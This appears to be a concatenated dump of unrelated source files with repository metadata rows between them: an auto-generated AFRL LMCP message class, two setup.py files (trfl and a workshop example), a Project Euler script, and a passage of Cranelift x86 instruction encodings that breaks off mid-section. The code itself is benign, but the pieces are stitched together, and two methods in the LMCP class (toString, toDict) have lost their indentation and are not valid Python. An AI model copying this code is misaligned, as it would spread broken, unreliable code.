if __name__ == '__main__':
unittest.main() | 39 | 112 | 0.624861 |
4b327c10835063ec43b0fedd0c7335d15ca2ac05 | 7,157 | py | Python | examples/CooperativeSearch/psaltlib/LMCP/py/afrl/impact/AngledAreaSearchTask.py | GaloisInc/salty | f410659b3399ad7c527513e67b06dff0332d823e | [
"BSD-3-Clause"
] | 13 | 2017-02-15T21:56:46.000Z | 2022-03-23T12:59:26.000Z | examples/VIP-Escort/lmcp/py/afrl/impact/AngledAreaSearchTask.py | GaloisInc/salty | f410659b3399ad7c527513e67b06dff0332d823e | [
"BSD-3-Clause"
] | 17 | 2016-07-21T10:47:23.000Z | 2020-08-07T13:26:21.000Z | examples/CooperativeSearch/psaltlib/LMCP/py/afrl/impact/AngledAreaSearchTask.py | GaloisInc/salty | f410659b3399ad7c527513e67b06dff0332d823e | [
"BSD-3-Clause"
] | 2 | 2019-06-11T11:59:40.000Z | 2022-02-09T12:48:39.000Z | #! /usr/bin/python
import sys, struct
import xml.dom.minidom
from lmcp import LMCPObject
## ===============================================================================
## Authors: AFRL/RQQA
## Organization: Air Force Research Laboratory, Aerospace Systems Directorate, Power and Control Division
##
## Copyright (c) 2017 Government of the United State of America, as represented by
## the Secretary of the Air Force. No copyright is claimed in the United States under
## Title 17, U.S. Code. All Other Rights Reserved.
## ===============================================================================
## This file was auto-created by LmcpGen. Modifications will be overwritten.
from afrl.cmasi import SearchTask
from afrl.cmasi import Location3D
class AngledAreaSearchTask(SearchTask.SearchTask):
    """Auto-generated LMCP message (series IMPACT, type 27).

    An area-search task swept at a fixed angle, optionally anchored at a
    start point. Generated by LmcpGen; manual edits will be overwritten.
    """
    def __init__(self):
        """Initialize LMCP type metadata and default field values."""
        SearchTask.SearchTask.__init__(self)
        self.LMCP_TYPE = 27
        self.SERIES_NAME = "IMPACT"
        self.FULL_LMCP_TYPE_NAME = "afrl.impact.AngledAreaSearchTask"
        #Series Name turned into a long for quick comparisons.
        self.SERIES_NAME_ID = 5281966179208134656
        self.SERIES_VERSION = 13
        #Define message fields
        self.SearchAreaID = 0   #int64
        self.SweepAngle = 0   #real32
        self.StartPoint = None   #Location3D
    def pack(self):
        """
        Serialize this object (base-class fields first) into a bytearray.

        Scalars are packed big-endian: SearchAreaID as int64 (">q"),
        SweepAngle as float32 (">f"). StartPoint is preceded by a one-byte
        presence flag; when present, its series id / LMCP type / series
        version header is written before its own packed payload.
        """
        buffer = bytearray()
        buffer.extend(SearchTask.SearchTask.pack(self))
        buffer.extend(struct.pack(">q", self.SearchAreaID))
        buffer.extend(struct.pack(">f", self.SweepAngle))
        # One-byte presence flag for the optional StartPoint object.
        buffer.extend(struct.pack("B", self.StartPoint != None ))
        if self.StartPoint != None:
            # Nested-object header: series name id, LMCP type, series version.
            buffer.extend(struct.pack(">q", self.StartPoint.SERIES_NAME_ID))
            buffer.extend(struct.pack(">I", self.StartPoint.LMCP_TYPE))
            buffer.extend(struct.pack(">H", self.StartPoint.SERIES_VERSION))
            buffer.extend(self.StartPoint.pack())
        return buffer
    def unpack(self, buffer, _pos):
        """
        Deserialize fields from `buffer` starting at offset `_pos`.

        Mirrors pack(): base-class fields, then int64 SearchAreaID, float32
        SweepAngle, a presence byte, and (if set) a series/type/version
        header used to instantiate StartPoint via the LMCP factory.
        Returns the offset just past the consumed bytes.
        """
        _pos = SearchTask.SearchTask.unpack(self, buffer, _pos)
        self.SearchAreaID = struct.unpack_from(">q", buffer, _pos)[0]
        _pos += 8
        self.SweepAngle = struct.unpack_from(">f", buffer, _pos)[0]
        _pos += 4
        # Presence flag for the optional StartPoint object.
        _valid = struct.unpack_from("B", buffer, _pos )[0]
        _pos += 1
        if _valid:
            _series = struct.unpack_from(">q", buffer, _pos)[0]
            _pos += 8
            _type = struct.unpack_from(">I", buffer, _pos)[0]
            _pos += 4
            _version = struct.unpack_from(">H", buffer, _pos)[0]
            _pos += 2
            # Local import avoids a circular dependency at module load time.
            from lmcp import LMCPFactory
            self.StartPoint = LMCPFactory.LMCPFactory().createObject(_series, _version, _type )
            _pos = self.StartPoint.unpack(buffer, _pos)
        else:
            self.StartPoint = None
        return _pos
    def unpackFromXMLNode(self, el, seriesFactory):
        """Populate fields from a DOM element; nested objects are built via
        `seriesFactory` from the child element's name and Series attribute."""
        SearchTask.SearchTask.unpackFromXMLNode(self, el, seriesFactory)
        for e in el.childNodes:
            if e.nodeType == xml.dom.Node.ELEMENT_NODE:
                if e.localName == "SearchAreaID" and len(e.childNodes) > 0 :
                    self.SearchAreaID = int(e.childNodes[0].nodeValue)
                elif e.localName == "SweepAngle" and len(e.childNodes) > 0 :
                    self.SweepAngle = float(e.childNodes[0].nodeValue)
                elif e.localName == "StartPoint" and len(e.childNodes) > 0 :
                    for n in e.childNodes:
                        if n.nodeType == xml.dom.Node.ELEMENT_NODE:
                            self.StartPoint = seriesFactory.createObjectByName(n.getAttribute('Series'), n.localName)
                            if self.StartPoint != None:
                                self.StartPoint.unpackFromXMLNode(n, seriesFactory)
        return
    def unpackFromDict(self, d, seriesFactory):
        """Populate fields from a dict; nested StartPoint is rebuilt via
        `seriesFactory`. Unknown keys are ignored."""
        SearchTask.SearchTask.unpackFromDict(self, d, seriesFactory)
        for key in d:
            if key == "SearchAreaID":
                self.SearchAreaID = d[key]
            elif key == "SweepAngle":
                self.SweepAngle = d[key]
            elif key == "StartPoint":
                self.StartPoint = seriesFactory.unpackFromDict(d[key])
        return
    # Generated accessors. Setters coerce to the LMCP wire type:
    # int for the int64 SearchAreaID, float for the real32 SweepAngle.
    def get_SearchAreaID(self):
        return self.SearchAreaID
    def set_SearchAreaID(self, value):
        self.SearchAreaID = int( value )
    def get_SweepAngle(self):
        return self.SweepAngle
    def set_SweepAngle(self, value):
        self.SweepAngle = float( value )
    def get_StartPoint(self):
        return self.StartPoint
    def set_StartPoint(self, value):
        self.StartPoint = value
def toString(self):
"""
Returns a string representation of all variables
"""
buf = SearchTask.SearchTask.toString(self)
buf += "From AngledAreaSearchTask:\n"
buf += "SearchAreaID = " + str( self.SearchAreaID ) + "\n"
buf += "SweepAngle = " + str( self.SweepAngle ) + "\n"
buf += "StartPoint = " + str( self.StartPoint ) + "\n"
return buf;
def toDict(self):
m = {}
self.toDictMembers(m)
d = {}
if ("IMPACT" is None) or ("IMPACT" is ""): # this should never happen
# need to fill this with error message
d["datatype"] = str("DEBUG_PROBLEM_HERE" + "/AngledAreaSearchTask")
d["datastring"] = str(m)
else:
d['datatype'] = str("IMPACT" + "/AngledAreaSearchTask")
d['datastring'] = str(m)
return d
    def toDictMembers(self, d):
        """Add this type's fields to `d` (after the base class adds its own);
        a present StartPoint is recursively converted with toDict()."""
        SearchTask.SearchTask.toDictMembers(self, d)
        d['SearchAreaID'] = self.SearchAreaID
        d['SweepAngle'] = self.SweepAngle
        if self.StartPoint == None:
            d['StartPoint'] = None
        else:
            d['StartPoint'] = self.StartPoint.toDict()
        return
    # LMCP type-identification accessors (constants set in __init__).
    def getLMCPType(self):
        return self.LMCP_TYPE
    def getSeriesName(self):
        return self.SERIES_NAME
    def getSeriesNameID(self):
        return self.SERIES_NAME_ID
    def getSeriesVersion(self):
        return self.SERIES_VERSION
    def toXMLStr(self, ws):
        """Return this object as an XML element, indented by prefix `ws`."""
        # NOTE: the generated local `str` shadows the builtin within this method.
        str = ws + '<AngledAreaSearchTask Series="IMPACT" >\n';
        #str +=SearchTask.SearchTask.toXMLMembersStr(self, ws + "    ")
        str += self.toXMLMembersStr(ws + "    ")
        str += ws + "</AngledAreaSearchTask>\n";
        return str
    def toXMLMembersStr(self, ws):
        """Return the member fields as XML child elements, indented by `ws`;
        an absent StartPoint is emitted as an explicit <null/> element."""
        buf = ""
        buf += SearchTask.SearchTask.toXMLMembersStr(self, ws)
        buf += ws + "<SearchAreaID>" + str(self.SearchAreaID) + "</SearchAreaID>\n"
        buf += ws + "<SweepAngle>" + str(self.SweepAngle) + "</SweepAngle>\n"
        buf += ws + "<StartPoint>\n"
        if self.StartPoint == None:
            buf += ws + "    <null/>\n"
        else:
            buf += ws + self.StartPoint.toXMLStr(ws + "    ")
        buf += ws + "</StartPoint>\n"
        return buf
| 35.606965 | 117 | 0.578175 |
43baa4e61c524ffe1ef7e3086ac851b30eb6e771 | 2,989 | py | Python | setup.py | hartikainen/trfl | e633edbd9d326b8bebc7c7c7d53f37118b48a440 | [
"Apache-2.0"
] | null | null | null | setup.py | hartikainen/trfl | e633edbd9d326b8bebc7c7c7d53f37118b48a440 | [
"Apache-2.0"
] | null | null | null | setup.py | hartikainen/trfl | e633edbd9d326b8bebc7c7c7d53f37118b48a440 | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 The trfl Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Setup for pip package."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import unittest
from setuptools import find_packages
from setuptools import setup
from setuptools.dist import Distribution
# Runtime dependencies installed unconditionally.
REQUIRED_PACKAGES = ['six', 'absl-py', 'numpy', 'wrapt', 'dm-tree']
# Optional extras: TensorFlow is not a hard dependency so users can choose the
# CPU or GPU build, pinned to the TF 1.15.x / TFP 0.8.x pair this release targets.
EXTRA_PACKAGES = {
    'tensorflow': [
        'tensorflow>=1.15,<1.16', 'tensorflow-probability>=0.8,<0.9'
    ],
    'tensorflow with gpu': [
        'tensorflow-gpu>=1.15,<1.16', 'tensorflow-probability>=0.8,<0.9'
    ],
}
def trfl_test_suite():
  """Discover and return the trfl unit-test suite (files matching *_test.py)."""
  loader = unittest.TestLoader()
  return loader.discover('trfl', pattern='*_test.py')
class BinaryDistribution(Distribution):
  """This class is needed in order to create OS specific wheels."""

  def has_ext_modules(self):
    # Claiming native extension modules makes bdist_wheel emit a
    # platform-specific wheel instead of a universal ("any") one.
    return True
# Package metadata for the trfl PyPI distribution.
setup(
    name='trfl',
    version='1.0.2',
    description=('trfl is a library of building blocks for '
                 'reinforcement learning algorithms.'),
    long_description='',
    url='http://www.github.com/deepmind/trfl/',
    author='DeepMind',
    author_email='trfl-steering@google.com',
    # Contained modules and scripts.
    packages=find_packages(),
    install_requires=REQUIRED_PACKAGES,
    extras_require=EXTRA_PACKAGES,
    # Add in any packaged data.
    include_package_data=True,
    zip_safe=False,
    # Custom Distribution forces platform-specific wheel tags.
    distclass=BinaryDistribution,
    # PyPI package information.
    classifiers=[
        'Development Status :: 4 - Beta',
        'Intended Audience :: Developers',
        'Intended Audience :: Education',
        'Intended Audience :: Science/Research',
        'License :: OSI Approved :: Apache Software License',
        'Operating System :: MacOS :: MacOS X',
        'Operating System :: POSIX',
        'Operating System :: Unix',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3.4',
        'Programming Language :: Python :: 3.5',
        'Programming Language :: Python :: 3.6',
        'Topic :: Scientific/Engineering :: Artificial Intelligence',
        'Topic :: Software Development :: Libraries',
    ],
    license='Apache 2.0',
    keywords='trfl truffle tensorflow tensor machine reinforcement learning',
    # `python setup.py test` runs the suite returned by trfl_test_suite().
    test_suite='setup.trfl_test_suite',
)
| 33.965909 | 78 | 0.668451 |
264a7b656c8231bb102da5df21535c0966dbb1a9 | 416 | py | Python | setup.py | wuyang0928/testrepo2 | e31c6b4aa701e162886c99f6db4b2928c26c99fe | [
"MIT"
] | null | null | null | setup.py | wuyang0928/testrepo2 | e31c6b4aa701e162886c99f6db4b2928c26c99fe | [
"MIT"
] | 1 | 2017-12-01T04:58:29.000Z | 2017-12-01T04:58:29.000Z | setup.py | wuyang0928/testrepo2 | e31c6b4aa701e162886c99f6db4b2928c26c99fe | [
"MIT"
] | 63 | 2017-11-27T06:46:37.000Z | 2020-10-14T14:23:29.000Z | from setuptools import setup, find_packages
# Minimal packaging metadata for the workshop example project.
setup(name='WorkshopExample',
      version='0.0.1',
      description='Random example project for coding workshop',
      url='http://github.com/Samreay/WorkshopExample',
      author='Samuel Hinton',
      author_email='samuelreay@gmail.com',
      license='MIT',
      install_requires=['numpy'],
      # Ship every package except tests, docs, and data directories.
      packages=find_packages(exclude=('tests', 'doc', 'data'))
      )
| 32 | 63 | 0.665865 |
d325dfe870886610f6405862e47b2904b64c917a | 369 | py | Python | 1.py | juandarr/ProjectEuler | 951705ac62f550d7fbecdc3f35ab8c38b53b9225 | [
"MIT"
] | null | null | null | 1.py | juandarr/ProjectEuler | 951705ac62f550d7fbecdc3f35ab8c38b53b9225 | [
"MIT"
] | null | null | null | 1.py | juandarr/ProjectEuler | 951705ac62f550d7fbecdc3f35ab8c38b53b9225 | [
"MIT"
] | null | null | null | """
Computes the sum of all multiples of 3 or 5 below a given number
Author: Juan Rios
"""
def multiple_of_3_or_5(number):
    """Return the sum of all multiples of 3 or 5 strictly below `number`.

    Args:
        number: exclusive upper bound; values <= 1 yield 0.

    Returns:
        Sum of every integer i with 1 <= i < number and i % 3 == 0 or i % 5 == 0.
    """
    # Generator expression replaces the manual accumulator loop and avoids
    # shadowing the builtin `sum`, which the old local variable did.
    return sum(i for i in range(1, number) if i % 3 == 0 or i % 5 == 0)
if __name__ == "__main__":
number = 1000
print('The sum of multiples of 3 or 5 below {0} is {1}'.format(number, multiple_of_3_or_5(number))) | 24.6 | 103 | 0.617886 |
8b5f9cf0bc04565ea1d03c8d51c47f29c9b8b54c | 27,138 | py | Python | cranelift-codegen/meta-python/isa/x86/encodings.py | benschau/cranelift | be02e945613270d17a316a23a58e0791d5712cee | [
"Apache-2.0"
] | null | null | null | cranelift-codegen/meta-python/isa/x86/encodings.py | benschau/cranelift | be02e945613270d17a316a23a58e0791d5712cee | [
"Apache-2.0"
] | null | null | null | cranelift-codegen/meta-python/isa/x86/encodings.py | benschau/cranelift | be02e945613270d17a316a23a58e0791d5712cee | [
"Apache-2.0"
] | null | null | null | """
x86 Encodings.
"""
from __future__ import absolute_import
from cdsl.predicates import IsZero32BitFloat, IsZero64BitFloat
from cdsl.predicates import IsUnsignedInt
from base.predicates import IsColocatedFunc, IsColocatedData, LengthEquals
from base import instructions as base
from base import types
from base.formats import UnaryIeee32, UnaryIeee64, UnaryImm
from base.formats import FuncAddr, Call, LoadComplex, StoreComplex
from .defs import X86_64, X86_32
from . import recipes as r
from . import settings as cfg
from . import instructions as x86
from .legalize import x86_expand
from base.legalize import narrow, widen, expand_flags
from .settings import use_sse41, not_all_ones_funcaddrs_and_not_is_pic, \
all_ones_funcaddrs_and_not_is_pic, is_pic, not_is_pic
try:
from typing import TYPE_CHECKING, Any # noqa
if TYPE_CHECKING:
from cdsl.instructions import MaybeBoundInst # noqa
from cdsl.predicates import FieldPredicate # noqa
except ImportError:
pass
# Register the legalization action for each controlling type on each ISA.
# Actions come from the legalizer definitions (base.legalize / .legalize):
# `narrow` and `widen` change operand width, `x86_expand` rewrites ops with
# no direct x86 encoding, and `expand_flags` handles b1/flag operations.
X86_32.legalize_monomorphic(expand_flags)
X86_32.legalize_type(
    default=narrow,
    b1=expand_flags,
    i8=widen,
    i16=widen,
    i32=x86_expand,
    f32=x86_expand,
    f64=x86_expand)
X86_64.legalize_monomorphic(expand_flags)
# x86-64 additionally legalizes native 64-bit integers via x86_expand.
X86_64.legalize_type(
    default=narrow,
    b1=expand_flags,
    i8=widen,
    i16=widen,
    i32=x86_expand,
    i64=x86_expand,
    f32=x86_expand,
    f64=x86_expand)
#
# Helper functions for generating encodings.
#
def enc_x86_64(inst, recipe, *args, **kwargs):
    # type: (MaybeBoundInst, r.TailRecipe, *int, **int) -> None
    """
    Add encodings for `inst` to X86_64 with and without a REX prefix.

    The REX form is added first so it is preferred by default; otherwise
    register allocation would never use r8 and up (see enc_i32_i64).
    """
    X86_64.enc(inst, *recipe.rex(*args, **kwargs))
    X86_64.enc(inst, *recipe(*args, **kwargs))
def enc_x86_64_instp(inst, recipe, instp, *args, **kwargs):
    # type: (MaybeBoundInst, r.TailRecipe, FieldPredicate, *int, **int) -> None
    """
    Add encodings for `inst` to X86_64 with and without a REX prefix,
    each guarded by the instruction predicate `instp`.
    """
    X86_64.enc(inst, *recipe.rex(*args, **kwargs), instp=instp)
    X86_64.enc(inst, *recipe(*args, **kwargs), instp=instp)
def enc_both(inst, recipe, *args, **kwargs):
    # type: (MaybeBoundInst, r.TailRecipe, *int, **Any) -> None
    """
    Add encodings for `inst` to both X86_32 and X86_64 (the latter with and
    without a REX prefix via enc_x86_64).
    """
    X86_32.enc(inst, *recipe(*args, **kwargs))
    enc_x86_64(inst, recipe, *args, **kwargs)
def enc_both_instp(inst, recipe, instp, *args, **kwargs):
    # type: (MaybeBoundInst, r.TailRecipe, FieldPredicate, *int, **Any) -> None
    """
    Add encodings for `inst` to both X86_32 and X86_64, each guarded by the
    instruction predicate `instp`.
    """
    X86_32.enc(inst, *recipe(*args, **kwargs), instp=instp)
    enc_x86_64_instp(inst, recipe, instp, *args, **kwargs)
def enc_i32_i64(inst, recipe, *args, **kwargs):
    # type: (MaybeBoundInst, r.TailRecipe, *int, **int) -> None
    """
    Add encodings for `inst.i32` to X86_32.
    Add encodings for `inst.i32` to X86_64 with and without REX.
    Add encodings for `inst.i64` to X86_64 with a REX.W prefix.
    """
    X86_32.enc(inst.i32, *recipe(*args, **kwargs))
    # REX-less encoding must come after REX encoding so we don't use it by
    # default. Otherwise reg-alloc would never use r8 and up.
    X86_64.enc(inst.i32, *recipe.rex(*args, **kwargs))
    X86_64.enc(inst.i32, *recipe(*args, **kwargs))
    # 64-bit operand size requires the REX.W bit (w=1).
    X86_64.enc(inst.i64, *recipe.rex(*args, w=1, **kwargs))
def enc_i32_i64_instp(inst, recipe, instp, *args, **kwargs):
    # type: (MaybeBoundInst, r.TailRecipe, FieldPredicate, *int, **int) -> None
    """
    Add encodings for `inst.i32` to X86_32.
    Add encodings for `inst.i32` to X86_64 with and without REX.
    Add encodings for `inst.i64` to X86_64 with a REX.W prefix.
    Similar to `enc_i32_i64` but applies `instp` to each encoding.
    """
    X86_32.enc(inst.i32, *recipe(*args, **kwargs), instp=instp)
    # REX-less encoding must come after REX encoding so we don't use it by
    # default. Otherwise reg-alloc would never use r8 and up.
    X86_64.enc(inst.i32, *recipe.rex(*args, **kwargs), instp=instp)
    X86_64.enc(inst.i32, *recipe(*args, **kwargs), instp=instp)
    X86_64.enc(inst.i64, *recipe.rex(*args, w=1, **kwargs), instp=instp)
def enc_i32_i64_ld_st(inst, w_bit, recipe, *args, **kwargs):
    # type: (MaybeBoundInst, bool, r.TailRecipe, *int, **int) -> None
    """
    Add encodings for `inst.i32` to X86_32.
    Add encodings for `inst.i32` to X86_64 with and without REX.
    Add encodings for `inst.i64` to X86_64 with a REX prefix, using the `w_bit`
    argument to determine whether or not to set the REX.W bit.
    """
    X86_32.enc(inst.i32.any, *recipe(*args, **kwargs))
    # REX-less encoding must come after REX encoding so we don't use it by
    # default. Otherwise reg-alloc would never use r8 and up.
    X86_64.enc(inst.i32.any, *recipe.rex(*args, **kwargs))
    X86_64.enc(inst.i32.any, *recipe(*args, **kwargs))
    if w_bit:
        X86_64.enc(inst.i64.any, *recipe.rex(*args, w=1, **kwargs))
    else:
        # When REX.W is not required, the plain REX-less form is also valid.
        X86_64.enc(inst.i64.any, *recipe.rex(*args, **kwargs))
        X86_64.enc(inst.i64.any, *recipe(*args, **kwargs))
for inst, opc in [
(base.iadd, 0x01),
(base.isub, 0x29),
(base.band, 0x21),
(base.bor, 0x09),
(base.bxor, 0x31)]:
enc_i32_i64(inst, r.rr, opc)
# x86 has a bitwise not instruction NOT.
enc_i32_i64(base.bnot, r.ur, 0xf7, rrr=2)
# Also add a `b1` encodings for the logic instructions.
# TODO: Should this be done with 8-bit instructions? It would improve
# partial register dependencies.
enc_both(base.band.b1, r.rr, 0x21)
enc_both(base.bor.b1, r.rr, 0x09)
enc_both(base.bxor.b1, r.rr, 0x31)
enc_i32_i64(base.imul, r.rrx, 0x0f, 0xaf)
enc_i32_i64(x86.sdivmodx, r.div, 0xf7, rrr=7)
enc_i32_i64(x86.udivmodx, r.div, 0xf7, rrr=6)
enc_i32_i64(x86.smulx, r.mulx, 0xf7, rrr=5)
enc_i32_i64(x86.umulx, r.mulx, 0xf7, rrr=4)
enc_i32_i64(base.copy, r.umr, 0x89)
for ty in [types.b1, types.i8, types.i16]:
enc_both(base.copy.bind(ty), r.umr, 0x89)
# For x86-64, only define REX forms for now, since we can't describe the
# special regunit immediate operands with the current constraint language.
for ty in [types.i8, types.i16, types.i32]:
X86_32.enc(base.regmove.bind(ty), *r.rmov(0x89))
X86_64.enc(base.regmove.bind(ty), *r.rmov.rex(0x89))
X86_64.enc(base.regmove.i64, *r.rmov.rex(0x89, w=1))
enc_both(base.regmove.b1, r.rmov, 0x89)
enc_both(base.regmove.i8, r.rmov, 0x89)
# Immediate instructions with sign-extended 8-bit and 32-bit immediate.
for inst, rrr in [
(base.iadd_imm, 0),
(base.band_imm, 4),
(base.bor_imm, 1),
(base.bxor_imm, 6)]:
enc_i32_i64(inst, r.r_ib, 0x83, rrr=rrr)
enc_i32_i64(inst, r.r_id, 0x81, rrr=rrr)
# TODO: band_imm.i64 with an unsigned 32-bit immediate can be encoded as
# band_imm.i32. Can even use the single-byte immediate for 0xffff_ffXX masks.
# Immediate constants.
X86_32.enc(base.iconst.i32, *r.pu_id(0xb8))
X86_64.enc(base.iconst.i32, *r.pu_id.rex(0xb8))
X86_64.enc(base.iconst.i32, *r.pu_id(0xb8))
# The 32-bit immediate movl also zero-extends to 64 bits.
X86_64.enc(base.iconst.i64, *r.pu_id.rex(0xb8),
instp=IsUnsignedInt(UnaryImm.imm, 32))
X86_64.enc(base.iconst.i64, *r.pu_id(0xb8),
instp=IsUnsignedInt(UnaryImm.imm, 32))
# Sign-extended 32-bit immediate.
X86_64.enc(base.iconst.i64, *r.u_id.rex(0xc7, rrr=0, w=1))
# Finally, the 0xb8 opcode takes an 8-byte immediate with a REX.W prefix.
X86_64.enc(base.iconst.i64, *r.pu_iq.rex(0xb8, w=1))
# bool constants.
enc_both(base.bconst.b1, r.pu_id_bool, 0xb8)
# Shifts and rotates.
# Note that the dynamic shift amount is only masked by 5 or 6 bits; the 8-bit
# and 16-bit shifts would need explicit masking.
for inst, rrr in [
(base.rotl, 0),
(base.rotr, 1),
(base.ishl, 4),
(base.ushr, 5),
(base.sshr, 7)]:
# Cannot use enc_i32_i64 for this pattern because instructions require
# .any suffix.
X86_32.enc(inst.i32.any, *r.rc(0xd3, rrr=rrr))
X86_64.enc(inst.i64.any, *r.rc.rex(0xd3, rrr=rrr, w=1))
X86_64.enc(inst.i32.any, *r.rc.rex(0xd3, rrr=rrr))
X86_64.enc(inst.i32.any, *r.rc(0xd3, rrr=rrr))
for inst, rrr in [
(base.rotl_imm, 0),
(base.rotr_imm, 1),
(base.ishl_imm, 4),
(base.ushr_imm, 5),
(base.sshr_imm, 7)]:
enc_i32_i64(inst, r.r_ib, 0xc1, rrr=rrr)
# Population count.
X86_32.enc(base.popcnt.i32, *r.urm(0xf3, 0x0f, 0xb8), isap=cfg.use_popcnt)
X86_64.enc(base.popcnt.i64, *r.urm.rex(0xf3, 0x0f, 0xb8, w=1),
isap=cfg.use_popcnt)
X86_64.enc(base.popcnt.i32, *r.urm.rex(0xf3, 0x0f, 0xb8), isap=cfg.use_popcnt)
X86_64.enc(base.popcnt.i32, *r.urm(0xf3, 0x0f, 0xb8), isap=cfg.use_popcnt)
# Count leading zero bits.
X86_32.enc(base.clz.i32, *r.urm(0xf3, 0x0f, 0xbd), isap=cfg.use_lzcnt)
X86_64.enc(base.clz.i64, *r.urm.rex(0xf3, 0x0f, 0xbd, w=1),
isap=cfg.use_lzcnt)
X86_64.enc(base.clz.i32, *r.urm.rex(0xf3, 0x0f, 0xbd), isap=cfg.use_lzcnt)
X86_64.enc(base.clz.i32, *r.urm(0xf3, 0x0f, 0xbd), isap=cfg.use_lzcnt)
# Count trailing zero bits.
X86_32.enc(base.ctz.i32, *r.urm(0xf3, 0x0f, 0xbc), isap=cfg.use_bmi1)
X86_64.enc(base.ctz.i64, *r.urm.rex(0xf3, 0x0f, 0xbc, w=1),
isap=cfg.use_bmi1)
X86_64.enc(base.ctz.i32, *r.urm.rex(0xf3, 0x0f, 0xbc), isap=cfg.use_bmi1)
X86_64.enc(base.ctz.i32, *r.urm(0xf3, 0x0f, 0xbc), isap=cfg.use_bmi1)
#
# Loads and stores.
#
ldcomplexp = LengthEquals(LoadComplex, 2)
for recipe in [r.ldWithIndex, r.ldWithIndexDisp8, r.ldWithIndexDisp32]:
enc_i32_i64_instp(base.load_complex, recipe, ldcomplexp, 0x8b)
enc_x86_64_instp(base.uload32_complex, recipe, ldcomplexp, 0x8b)
X86_64.enc(base.sload32_complex, *recipe.rex(0x63, w=1),
instp=ldcomplexp)
enc_i32_i64_instp(base.uload16_complex, recipe, ldcomplexp, 0x0f, 0xb7)
enc_i32_i64_instp(base.sload16_complex, recipe, ldcomplexp, 0x0f, 0xbf)
enc_i32_i64_instp(base.uload8_complex, recipe, ldcomplexp, 0x0f, 0xb6)
enc_i32_i64_instp(base.sload8_complex, recipe, ldcomplexp, 0x0f, 0xbe)
stcomplexp = LengthEquals(StoreComplex, 3)
for recipe in [r.stWithIndex, r.stWithIndexDisp8, r.stWithIndexDisp32]:
enc_i32_i64_instp(base.store_complex, recipe, stcomplexp, 0x89)
enc_x86_64_instp(base.istore32_complex, recipe, stcomplexp, 0x89)
enc_both_instp(base.istore16_complex.i32, recipe, stcomplexp, 0x66, 0x89)
enc_x86_64_instp(base.istore16_complex.i64, recipe, stcomplexp, 0x66, 0x89)
for recipe in [r.stWithIndex_abcd,
r.stWithIndexDisp8_abcd,
r.stWithIndexDisp32_abcd]:
enc_both_instp(base.istore8_complex.i32, recipe, stcomplexp, 0x88)
enc_x86_64_instp(base.istore8_complex.i64, recipe, stcomplexp, 0x88)
for recipe in [r.st, r.stDisp8, r.stDisp32]:
enc_i32_i64_ld_st(base.store, True, recipe, 0x89)
enc_x86_64(base.istore32.i64.any, recipe, 0x89)
enc_i32_i64_ld_st(base.istore16, False, recipe, 0x66, 0x89)
# Byte stores are more complicated because the registers they can address
# depends of the presence of a REX prefix. The st*_abcd recipes fall back to
# the corresponding st* recipes when a REX prefix is applied.
for recipe in [r.st_abcd, r.stDisp8_abcd, r.stDisp32_abcd]:
enc_both(base.istore8.i32.any, recipe, 0x88)
enc_x86_64(base.istore8.i64.any, recipe, 0x88)
enc_i32_i64(base.spill, r.spillSib32, 0x89)
enc_i32_i64(base.regspill, r.regspill32, 0x89)
# Use a 32-bit write for spilling `b1`, `i8` and `i16` to avoid
# constraining the permitted registers.
# See MIN_SPILL_SLOT_SIZE which makes this safe.
for ty in [types.b1, types.i8, types.i16]:
enc_both(base.spill.bind(ty), r.spillSib32, 0x89)
enc_both(base.regspill.bind(ty), r.regspill32, 0x89)
for recipe in [r.ld, r.ldDisp8, r.ldDisp32]:
enc_i32_i64_ld_st(base.load, True, recipe, 0x8b)
enc_x86_64(base.uload32.i64, recipe, 0x8b)
X86_64.enc(base.sload32.i64, *recipe.rex(0x63, w=1))
enc_i32_i64_ld_st(base.uload16, True, recipe, 0x0f, 0xb7)
enc_i32_i64_ld_st(base.sload16, True, recipe, 0x0f, 0xbf)
enc_i32_i64_ld_st(base.uload8, True, recipe, 0x0f, 0xb6)
enc_i32_i64_ld_st(base.sload8, True, recipe, 0x0f, 0xbe)
enc_i32_i64(base.fill, r.fillSib32, 0x8b)
enc_i32_i64(base.regfill, r.regfill32, 0x8b)
# Load 32 bits from `b1`, `i8` and `i16` spill slots. See `spill.b1` above.
for ty in [types.b1, types.i8, types.i16]:
enc_both(base.fill.bind(ty), r.fillSib32, 0x8b)
enc_both(base.regfill.bind(ty), r.regfill32, 0x8b)
# Push and Pop
X86_32.enc(x86.push.i32, *r.pushq(0x50))
enc_x86_64(x86.push.i64, r.pushq, 0x50)
X86_32.enc(x86.pop.i32, *r.popq(0x58))
enc_x86_64(x86.pop.i64, r.popq, 0x58)
# Copy Special
# For x86-64, only define REX forms for now, since we can't describe the
# special regunit immediate operands with the current constraint language.
X86_64.enc(base.copy_special, *r.copysp.rex(0x89, w=1))
X86_32.enc(base.copy_special, *r.copysp(0x89))
# Adjust SP down by a dynamic value (or up, with a negative operand).
X86_32.enc(base.adjust_sp_down.i32, *r.adjustsp(0x29))
X86_64.enc(base.adjust_sp_down.i64, *r.adjustsp.rex(0x29, w=1))
# Adjust SP up by an immediate (or down, with a negative immediate)
X86_32.enc(base.adjust_sp_up_imm, *r.adjustsp_ib(0x83))
X86_32.enc(base.adjust_sp_up_imm, *r.adjustsp_id(0x81))
X86_64.enc(base.adjust_sp_up_imm, *r.adjustsp_ib.rex(0x83, w=1))
X86_64.enc(base.adjust_sp_up_imm, *r.adjustsp_id.rex(0x81, w=1))
# Adjust SP down by an immediate (or up, with a negative immediate)
X86_32.enc(base.adjust_sp_down_imm, *r.adjustsp_ib(0x83, rrr=5))
X86_32.enc(base.adjust_sp_down_imm, *r.adjustsp_id(0x81, rrr=5))
X86_64.enc(base.adjust_sp_down_imm, *r.adjustsp_ib.rex(0x83, rrr=5, w=1))
X86_64.enc(base.adjust_sp_down_imm, *r.adjustsp_id.rex(0x81, rrr=5, w=1))
#
# Float loads and stores.
#
enc_both(base.load.f32.any, r.fld, 0xf3, 0x0f, 0x10)
enc_both(base.load.f32.any, r.fldDisp8, 0xf3, 0x0f, 0x10)
